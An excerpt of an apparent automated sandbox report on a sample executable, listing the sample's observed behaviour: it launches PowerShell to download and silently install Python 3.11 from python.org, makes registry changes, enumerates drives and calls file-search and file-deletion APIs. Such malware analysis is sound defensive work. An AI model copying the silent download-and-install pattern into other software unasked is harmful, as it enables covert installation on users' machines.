Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\calendar.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\cgi.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\cgitb.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\chunk.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\cmd.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\code.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\codecs.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\codeop.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\collections\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\collections\abc.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\colorsys.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\compileall.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\concurrent\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\concurrent\futures\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\concurrent\futures\_base.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\concurrent\futures\process.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\concurrent\futures\thread.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\configparser.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\contextlib.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\contextvars.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\copy.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\copyreg.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\cProfile.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\crypt.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\csv.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\_aix.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\_endian.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\macholib\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\macholib\dyld.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\macholib\dylib.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\macholib\fetch_macholib
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\macholib\fetch_macholib.bat
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\macholib\framework.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\macholib\README.ctypes
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\__main__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_anon.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_array_in_pointer.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_arrays.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_as_parameter.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_bitfields.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_buffers.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_bytes.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_byteswap.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_callbacks.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_cast.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_cfuncs.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_checkretval.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_delattr.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_errno.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_find.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_frombuffer.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_funcptr.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_functions.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_incomplete.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_init.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_internals.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_keeprefs.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_libc.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_loading.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_macholib.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_memfunctions.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_numbers.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_objects.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_parameters.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_pep3118.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_pickling.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_pointers.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_prototypes.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_python_api.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_random_things.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_refcounts.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_repr.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_returnfuncptrs.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_simplesubclasses.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_sizes.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_slicing.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_stringptr.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_strings.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_struct_fields.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_structures.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_unaligned_structures.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_unicode.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_values.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_varsize_struct.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_win32.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\test\test_wintypes.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\util.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\ctypes\wintypes.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\curses\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\curses\ascii.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\curses\has_key.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\curses\panel.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\curses\textpad.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\dataclasses.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\datetime.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\dbm\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\dbm\dumb.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\dbm\gnu.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\dbm\ndbm.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\decimal.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\difflib.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\dis.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\distutils\__init__.py
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\Lib\distutils\_msvccompiler.py
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore SRInitDoneJump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7f8381ad-2e42-4432-8de5-c7beebe1009f}Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311\LICENSE.txt
Source: unknownHTTPS traffic detected: 151.101.0.223:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: 3Af7PybsUi.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: 3Af7PybsUi.exe, 00000000.00000003.1316082858.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\agent\_work\138\s\build\ship\x86\burn.pdb source: tmpaf99aaqq.exe, 00000008.00000000.1849984571.00000000000EB000.00000002.00000001.01000000.0000001B.sdmp, tmpaf99aaqq.exe, 00000009.00000000.1852928969.000000000089B000.00000002.00000001.01000000.0000001D.sdmp, python-3.11.0-amd64.exe, 0000000A.00000000.1866271426.000000000009B000.00000002.00000001.01000000.00000021.sdmp, python-3.11.0-amd64.exe, 00000017.00000000.2117506840.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 00000018.00000000.2120418916.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 00000019.00000000.2123701363.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001A.00000000.2198842671.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001A.00000002.2219594362.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001B.00000000.2202150381.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001C.00000000.2209475341.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001F.00000000.2220206160.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: 3Af7PybsUi.exe, 00000000.00000003.1317192241.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: 3Af7PybsUi.exe, 00000000.00000003.1317878527.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: 3Af7PybsUi.exe, 00000000.00000003.1316209124.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: 3Af7PybsUi.exe, 00000000.00000003.1318595498.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: 3Af7PybsUi.exe, 00000000.00000003.1318116340.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: 3Af7PybsUi.exe, 00000000.00000003.1317878527.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: 3Af7PybsUi.exe, 00000000.00000003.1316346546.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: 3Af7PybsUi.exe, 00000000.00000003.1319083216.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: 3Af7PybsUi.exe, 00000000.00000003.1315925117.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: 3Af7PybsUi.exe, 00000000.00000003.1315925117.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: 3Af7PybsUi.exe, 00000000.00000003.1318706671.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb''&GCTL source: 3Af7PybsUi.exe, 00000000.00000003.1319083216.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: 3Af7PybsUi.exe, 00000000.00000003.1318007951.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: 3Af7PybsUi.exe, 00000000.00000003.1316082858.000002643EF75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\agent\_work\138\s\build\ship\x86\burn.pdb/ source: tmpaf99aaqq.exe, 00000008.00000000.1849984571.00000000000EB000.00000002.00000001.01000000.0000001B.sdmp, tmpaf99aaqq.exe, 00000009.00000000.1852928969.000000000089B000.00000002.00000001.01000000.0000001D.sdmp, python-3.11.0-amd64.exe, 0000000A.00000000.1866271426.000000000009B000.00000002.00000001.01000000.00000021.sdmp, python-3.11.0-amd64.exe, 00000017.00000000.2117506840.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 00000018.00000000.2120418916.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 00000019.00000000.2123701363.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001A.00000000.2198842671.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001A.00000002.2219594362.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001B.00000000.2202150381.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001C.00000000.2209475341.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001F.00000000.2220206160.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp
Source: C:\Windows\System32\msiexec.exeFile opened: z:
Source: C:\Windows\System32\msiexec.exeFile opened: x:
Source: C:\Windows\System32\msiexec.exeFile opened: v:
Source: C:\Windows\System32\msiexec.exeFile opened: t:
Source: C:\Windows\System32\msiexec.exeFile opened: r:
Source: C:\Windows\System32\msiexec.exeFile opened: p:
Source: C:\Windows\System32\msiexec.exeFile opened: n:
Source: C:\Windows\System32\msiexec.exeFile opened: l:
Source: C:\Windows\System32\msiexec.exeFile opened: j:
Source: C:\Windows\System32\msiexec.exeFile opened: h:
Source: C:\Windows\System32\msiexec.exeFile opened: f:
Source: C:\Windows\System32\msiexec.exeFile opened: b:
Source: C:\Windows\System32\msiexec.exeFile opened: y:
Source: C:\Windows\System32\msiexec.exeFile opened: w:
Source: C:\Windows\System32\msiexec.exeFile opened: u:
Source: C:\Windows\System32\msiexec.exeFile opened: s:
Source: C:\Windows\System32\msiexec.exeFile opened: q:
Source: C:\Windows\System32\msiexec.exeFile opened: o:
Source: C:\Windows\System32\msiexec.exeFile opened: m:
Source: C:\Windows\System32\msiexec.exeFile opened: k:
Source: C:\Windows\System32\msiexec.exeFile opened: i:
Source: C:\Windows\System32\msiexec.exeFile opened: g:
Source: C:\Windows\System32\msiexec.exeFile opened: e:
Source: C:\Windows\System32\SrTasks.exeFile opened: c:
Source: C:\Windows\System32\msiexec.exeFile opened: a:
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262985A0 FindFirstFileExW,FindClose,0_2_00007FF7262985A0
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262979B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7262979B0
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262B0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7262B0B84
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004B7857 FindFirstFileExW,23_2_004B7857
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004C488B FindFirstFileW,FindClose,23_2_004C488B
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_00499B24 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,23_2_00499B24
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_00483D89 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,23_2_00483D89
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeFile opened: C:\ProgramData\Package Cache\{0025DD72-A959-45B5-A0A3-7EFEB15A8050}v14.36.32532\NULLJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeFile opened: C:\ProgramData\Package Cache\{0025DD72-A959-45B5-A0A3-7EFEB15A8050}v14.36.32532\packagesJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeFile opened: C:\ProgramData\Package Cache\{0025DD72-A959-45B5-A0A3-7EFEB15A8050}v14.36.32532\packages\vcRuntimeAdditional_amd64Jump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeFile opened: C:\ProgramData\Package Cache\{0025DD72-A959-45B5-A0A3-7EFEB15A8050}v14.36.32532Jump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeFile opened: C:\ProgramData\Package Cache\NULLJump to behavior
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeFile opened: C:\ProgramData\Package Cache\{0025DD72-A959-45B5-A0A3-7EFEB15A8050}v14.36.32532\packages\NULLJump to behavior
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /ftp/python/3.11.0/python-3.11.0-amd64.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.python.orgConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /ftp/python/3.11.0/python-3.11.0-amd64.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.python.orgConnection: Keep-Alive
Source: 3Af7PybsUi.exe, 00000003.00000003.1855365547.000001EC89858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: # Extensive documentation on this process has been included on my YouTube channel: https://www.youtube.com/watch?v=QB7ACr7pUuE equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: www.python.org
Source: python-3.11.0-amd64.exeString found in binary or memory: http://appsyndication.org/2006/appsyn
Source: tmpaf99aaqq.exe, 00000008.00000000.1849984571.00000000000EB000.00000002.00000001.01000000.0000001B.sdmp, tmpaf99aaqq.exe, 00000009.00000000.1852928969.000000000089B000.00000002.00000001.01000000.0000001D.sdmp, python-3.11.0-amd64.exe, 0000000A.00000000.1866271426.000000000009B000.00000002.00000001.01000000.00000021.sdmp, python-3.11.0-amd64.exe, 00000017.00000000.2117506840.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 00000018.00000000.2120418916.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 00000019.00000000.2123701363.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001A.00000000.2198842671.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001A.00000002.2219594362.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001B.00000000.2202150381.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001C.00000000.2209475341.00000000004CB000.00000002.00000001.01000000.0000002A.sdmp, python-3.11.0-amd64.exe, 0000001F.00000000.2220206160.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpString found in binary or memory: http://appsyndication.org/2006/appsynapplicationc:
Source: 3Af7PybsUi.exe, 00000000.00000003.1318888772.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316209124.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318706671.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318116340.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1319083216.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316649927.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317878527.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317192241.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316822581.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318007951.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316346546.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318595498.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029356D88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029355B3B000.00000004.00000800.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.2039383354.0000000005471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 3Af7PybsUi.exe, 00000000.00000003.1318888772.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316209124.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318706671.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318116340.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1319083216.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316649927.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317878527.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1317192241.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316822581.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318007951.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1316346546.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000003.1318595498.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029356D88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1651080578.0000029355B3B000.00000004.00000800.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.2039383354.0000000005471000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
